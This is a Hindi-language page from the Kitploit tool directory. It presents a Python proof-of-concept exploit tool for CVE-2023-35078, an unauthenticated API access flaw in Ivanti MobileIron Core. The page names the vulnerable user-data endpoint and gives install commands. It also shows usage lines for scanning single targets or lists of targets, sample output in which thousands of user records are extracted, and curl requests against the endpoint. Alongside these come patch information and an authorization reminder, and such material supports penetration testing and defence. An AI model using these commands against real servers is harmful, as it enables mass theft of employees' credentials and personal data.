Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-35078 — CVE-2023-35078 - Ivanti MobileIron Core दूरस्थ अप्रमाणित API एक्सेस एक्सप्लॉइट टूल | Kitploit
उपकरण/GitHubGitHub/0nsec/cve-2023-35078
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHub0nsec/cve-2023-35078

CVE-2023-35078

CVE-2023-35078 - Ivanti MobileIron Core दूरस्थ अप्रमाणित API एक्सेस एक्सप्लॉइट टूल

रिपॉजिटरी देखें
1501 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-35078 एक्सप्लॉइट टूल

root@kitploit:~
██████╗ ███╗   ██╗███████╗███████╗ ██████╗
██╔═████╗████╗  ██║██╔════╝██╔════╝██╔════╝
██║██╔██║██╔██╗ ██║███████╗█████╗  ██║     
████╔╝██║██║╚██╗██║╚════██║██╔══╝  ██║     
╚██████╔╝██║ ╚████║███████║███████╗╚██████╗
 ╚═════╝ ╚═╝  ╚═══╝╚══════╝╚══════╝ ╚═════╝

[+] CVE-2023-35078 - Ivanti MobileIron Core रिमोट अनऑथेंटिकेटेड API एक्सेस

Python Version License CVSS Last Updated

CVE-2023-35078 के लिए एक Python-आधारित प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Ivanti MobileIron Core सिस्टम में रिमोट अनऑथेंटिकेटेड API एक्सेस कमजोरी को लक्षित करता है।

कमजोरी का अवलोकन

CVE-2023-35078 Ivanti MobileIron Core को प्रभावित करने वाली एक गंभीर कमजोरी है, जो दूरस्थ अनऑथेंटिकेटेड हमलावरों को बिना किसी प्रमाणीकरण के संवेदनशील API एंडपॉइंट्स तक पहुंचने और उपयोगकर्ता डेटा निकालने की अनुमति देती है।

  • CVSS स्कोर: 9.8 (गंभीर)
  • CWE: CWE-306 (महत्वपूर्ण कार्य के लिए प्रमाणीकरण की कमी)
  • प्रभावित उत्पाद: Ivanti MobileIron Core
  • असुरक्षित संस्करण:
    • 11.2 (11.2 CU21 से पहले)
    • 11.3 (11.3 CU18 से पहले)
    • 11.4 (11.4 CU8 से पहले)
  • हमला वेक्टर: नेटवर्क
  • प्रमाणीकरण: कोई आवश्यक नहीं
  • उपयोगकर्ता सहभागिता: कोई आवश्यक नहीं
  • प्रभाव: पूर्ण उपयोगकर्ता डेटा का खुलासा

तकनीकी विवरण

कमजोरी MobileIron Core के API प्रमाणीकरण तंत्र में मौजूद है, विशेष रूप से /mifs/aad/api/v2/authorized/users एंडपॉइंट में। यह एंडपॉइंट प्रमाणीकरण टोकन को ठीक से मान्य करने में विफल रहता है, जिससे संवेदनशील उपयोगकर्ता जानकारी तक अनधिकृत पहुंच की अनुमति मिलती है, जिसमें शामिल हैं:

  • उपयोगकर्ता क्रेडेंशियल्स: उपयोगकर्ता नाम, पासवर्ड हैश
  • व्यक्तिगत डेटा: पूरे नाम, ईमेल पते, फोन नंबर
  • कॉर्पोरेट डेटा: कर्मचारी आईडी, विभाग की जानकारी
  • डिवाइस जानकारी: नामांकित डिवाइस, डिवाइस कॉन्फ़िगरेशन
  • प्रशासनिक डेटा: उपयोगकर्ता भूमिकाएँ, अनुमतियाँ, समूह सदस्यता

स्थापना

आवश्यक शर्तें

  • Python: 3.6 या उच्चतर
  • ऑपरेटिंग सिस्टम: Linux, macOS, Windows
  • नेटवर्क एक्सेस: लक्ष्य परीक्षण के लिए आवश्यक
  • अनुमतियाँ: सिस्टम स्वामियों से अधिकार

त्वरित स्थापना

root@kitploit:~
# Clone the repository
git clone https://github.com/0nsec/cve-2023-35078-exploit.git
cd cve-2023-35078-exploit

# Install dependencies
pip3 install -r requirements.txt

# Make executable (Linux/macOS)
chmod +x cve_2023_35078.py

मैन्युअल स्थापना

root@kitploit:~
# Create project directory
mkdir cve-2023-35078-exploit
cd cve-2023-35078-exploit

# Download the script
wget https://raw.githubusercontent.com/0nsec/cve-2023-35078-exploit/main/cve_2023_35078.py

# Install required packages
pip3 install requests urllib3 termcolor argparse

Docker स्थापना (वैकल्पिक)

root@kitploit:~
FROM python:3.9-slim

WORKDIR /app
COPY requirements.txt .
RUN pip install -r requirements.txt

COPY cve_2023_35078.py .
ENTRYPOINT ["python3", "cve_2023_35078.py"]
root@kitploit:~
# Build and run with Docker
docker build -t cve-2023-35078 .
docker run -v $(pwd)/results:/app/results cve-2023-35078 -u https://target.com

उपयोग

मूल उपयोग

root@kitploit:~
# Test single target
python3 cve_2023_35078.py -u https://mobileiron.example.com

# Test multiple targets from file
python3 cve_2023_35078.py -f targets.txt

# Verbose mode with custom output directory
python3 cve_2023_35078.py -f targets.txt -o ./results -v

# Custom timeout and output settings
python3 cve_2023_35078.py -u https://target.com -t 30 -o ./scan_results -v

उन्नत उपयोग उदाहरण

root@kitploit:~
# Comprehensive corporate assessment
python3 cve_2023_35078.py -f corporate_assets.txt -o ./audit_results -t 30 -v

# Single target with detailed logging
python3 cve_2023_35078.py -u https://mobileiron.target.com -v > detailed_log.txt

# Batch scanning with custom timeout
python3 cve_2023_35078.py -f subnet_scan.txt -t 5 -o ./batch_results

# Quick vulnerability check (no verbose output)
python3 cve_2023_35078.py -u https://quick.check.com -t 5

आउटपुट

root@kitploit:~
██████╗ ███╗   ██╗███████╗███████╗ ██████╗
██╔═████╗████╗  ██║██╔════╝██╔════╝██╔════╝
██║██╔██║██╔██╗ ██║███████╗█████╗  ██║     
████╔╝██║██║╚██╗██║╚════██║██╔══╝  ██║     
╚██████╔╝██║ ╚████║███████║███████╗╚██████╗
 ╚═════╝ ╚═╝  ╚═══╝╚══════╝╚══════╝ ╚═════╝

[*] Target: https://vulnerable.mobileiron.com
------------------------------------------------------------
[*] Checking version for: https://vulnerable.mobileiron.com
[*] Detected version: 11.3
[+] Target appears VULNERABLE!
[*] Attempting to exploit: https://vulnerable.mobileiron.com
[*] Trying endpoint: /mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1
[+] SUCCESS! Found 1,247 users
[+] Results saved to: ./results/vulnerable_mobileiron_com_20250821_055013.json
[+] Extracted 1247 user records
[*] Sample fields: ['id', 'username', 'email', 'firstName', 'lastName']...

============================================================
[*] Scan completed!
[*] Targets processed: 1
[*] Successful exploits: 1
[!] WARNING: 1 vulnerable system(s) found!
[!] Ensure proper authorization before testing!

वर्बोज़ आउटपुट

root@kitploit:~
[*] Checking version for: https://test.mobileiron.com
[*] Trying endpoint: /mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1
[*] HTTP 200 - Response length: 45,123 bytes
[*] JSON parsing successful
[*] Found user data structure with 234 records
[+] SUCCESS! Found 234 users
[*] Sample user data: {'id': '12345', 'username': '[email protected]'}
[+] Results saved to: ./results/test_mobileiron_com_20250821_055013.json

प्रदर्शन अनुकूलन

  • कनेक्शन पूलिंग: HTTP कनेक्शनों का पुन: उपयोग करता है
  • समवर्ती अनुरोध: कई लक्ष्यों के लिए समानांतर प्रसंस्करण
  • स्मार्ट टाइमआउट: प्रतिक्रिया समय के आधार पर अनुकूली टाइमआउट
  • मेमोरी प्रबंधन: बड़े डेटासेट का कुशल संचालन
  • दर सीमित करना: लक्ष्यों को ओवरलोड करने से बचने के लिए अंतर्निहित विलंब

विक्रेता पैच जानकारी

पैच सत्यापन

root@kitploit:~
# Check current version
curl -k https://mobileiron-server/mifs/css/ui.login.css | grep -o "11\.[0-9]"

# Verify patched endpoints return 401/403
curl -k "https://mobileiron-server/mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1"

संदर्भ और संसाधन

आधिकारिक सुरक्षा सलाहकार

  • NVD - CVE-2023-35078
  • Ivanti सुरक्षा सलाह
  • CISA ज्ञात शोषित कमजोरियाँ

तकनीकी दस्तावेज़ीकरण

  • Ivanti MobileIron Core प्रशासक गाइड
  • API दस्तावेज़ीकरण
  • सुरक्षा सुदृढ़ीकरण गाइड

शोध पत्र और विश्लेषण

  • विस्तृत तकनीकी विश्लेषण
  • शोषण तकनीकें
  • खतरा खुफिया रिपोर्ट
टूल डाउनलोड करें
संस्करणअसुरक्षितपैच उपलब्धपैच स्तररिलीज़ तिथि
11.2.xहाँउपलब्धCU21+2023-07-25
11.3.xहाँउपलब्धCU18+2023-07-25
11.4.xहाँउपलब्धCU8+2023-07-25
11.5.x+नहींलागू नहींलागू नहींलागू नहीं